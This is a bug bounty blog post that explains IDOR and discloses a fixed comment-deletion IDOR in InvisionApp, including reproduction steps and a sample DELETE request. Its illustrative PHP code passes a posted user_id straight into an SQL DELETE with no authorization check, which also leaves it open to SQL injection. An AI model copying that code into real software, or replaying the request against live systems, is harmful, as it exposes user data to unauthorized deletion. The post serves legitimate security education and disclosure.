400$ WORTH IDOR AND IDOR EXPLAINED

Hello Everyone out there! This days i’m busy with some other stuff but after a long interval of time in April i again started to hunt bugs to get some bulks for my vacation trip lol :p . When i started hunting in April, I set my aim to InvisionApp.com.

What is IDOR ?
In simple words we can say, taking actions from another user’s account from your account without any interaction with user.

Why IDOR happen?
This happen when a backend have lack of authentication check, check my bellow explanation if you want to understand it
Suppose a web app is deleting user account in this way,

Delete Account form
1
2
3
4
<form method="post" action="http://vulnerable.com/user/delete_account/">
<input type="hidden" name="user_id" value="12345678">
<input type="submit" value="Delete Account">
</form>

Code working on /user/delete_account/
1
2
3
4
5
6
7
8
9
10
11
<?php
include "connection_db.php";
$user_id = $_POST['user_id'];
$sql = "DELETE FROM user WHERE id={$user_id}";
if ($conn->query($sql) === TRUE) {
    echo "User account deleted successfully";
} else {
    echo "Error deleting user account " . $conn->error;
}
?>

Okay as you seen there is no authentication check whenever a valid user_id value will be given and if it exist in DB it will be deleted which is so critical, this can be prevented in many ways like session check a password verification and many  other ways. i hope now you understood how IDOR works now please read bellow PoC.

While testing InvisionApp i came across Board section where you can make board and post in it and anyone can comment on it only ADMIN of board have rights to delete any other comment. So i created two accounts one was admin and one was normal user, and tried to delete Admin’s comment. So let me be in short bellow is the reproduction steps,


Steps to Reproduce : “A” Admin & “B” Attacker

1- Sign in from 2 different accounts ( A & B ) in 2 different browsers ( or use incognito as 2nd browser )
2- Now go to “A” account and create a board and add anything in it.
3- Comment from both “A” & “B” account.
4- Note down comment id of vitim’s comment ( Means ID of “A” )
5- Now go to “B” account, and capture the request while deleting comment of “B” account and change comment id (of “A” account) in URL ( Example : api/board/item/comment/*COMMENT ID* )
In “B” account u do not have option to delete comment of admin which is “A”
6- Status will be “200 OK” and comment should be deleted of another account


HTTP Request Example

DELETE /api/board/item/comment/*VICTIM COMMENT ID* HTTP/1.1
Host: projects.invisionapp.com
Connection: keep-alive
X-Timezone-Offset: -420
Origin: https://projects.invisionapp.com
X-XSRF-TOKEN: dTK57p6DW5mteX-nBBanCmeza0RUvUaI1JksYSQF0cU
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36
X-Referrer-Hash: #/boards/2636413/80399396
Accept: application/json, text/plain, /
X-Page-Loaded-At: 1459747535276
Referer: https://projects.invisionapp.com/d/main
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ** Cookies Goes Here **

Bug Timeline :
3rd April : Reported Bug.
6th April : Triaged.
10th April : Given to developers to fix.
14th April : Asked to confirm the fix.
14th April : Fix confirmed by me
15th April : Rewarded with 400 USD

Video Poc :



2 comments: